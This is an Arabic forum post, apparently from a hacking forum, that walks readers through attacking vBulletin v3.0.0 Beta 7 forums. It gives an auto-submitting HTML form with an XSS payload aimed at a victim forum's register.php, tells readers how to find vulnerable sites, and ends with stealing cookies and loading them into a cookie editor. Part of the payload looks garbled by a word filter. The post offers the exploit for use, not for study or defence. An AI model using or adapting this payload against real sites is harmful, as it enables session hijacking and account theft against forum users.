بسم الله الحمن الرحيم
--------------------------------
الكاتب :islamm2003
الحقوق محفوظه للكاتب islamm203
--------------------------
الثغره موجوده في منتديات vBulletin v3.0.0 Beta 7 والكثير من المنتديات مصابه
--------------------------------
اول شئ روح لموقع البحث مثل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
ابحث عن هذه الكلمه
vBulletin v3.0.0 Beta 7
----------------------------------------------
خود هذه الكود وضعه في المفكره Notepad وحفظه بمنداد html
كود:
كود:
<form action="http://[VICTIM - FORUM PATH]/register.php?do=register"
method="post" style="display:none">
<input type="hidden" name="s" value="" />
<input type="hidden" name="regtype" value="1" />
<input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" />
<input type="hidden" name="url" value="index.php" />
<input type="hidden" name="do" value="addmember" /> </form> <script>
//Code that will be executed
var xss = "\"><script>alert(document"+".ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر)<\/script>";
document.forms(0).field1.value=xss;
document.forms(0).submit();
</script>
---------------------------------------------------------------
مثل هذه الموقع مصاب بالثغره
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
غير في الكود [VICTIM - FORUM PATH]/ الي المنتديات المصابه
احفظ الملف بمتداد html
------------------------------------------------
افتح ملف الهوتمل هيظهر ليك الكوكيز للـ المنتدي المصاب الان
الان انت عارف الباقي عن طريق برنامج ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر Editor واكيد استخدمته في ثغره last10.php
تحياتي
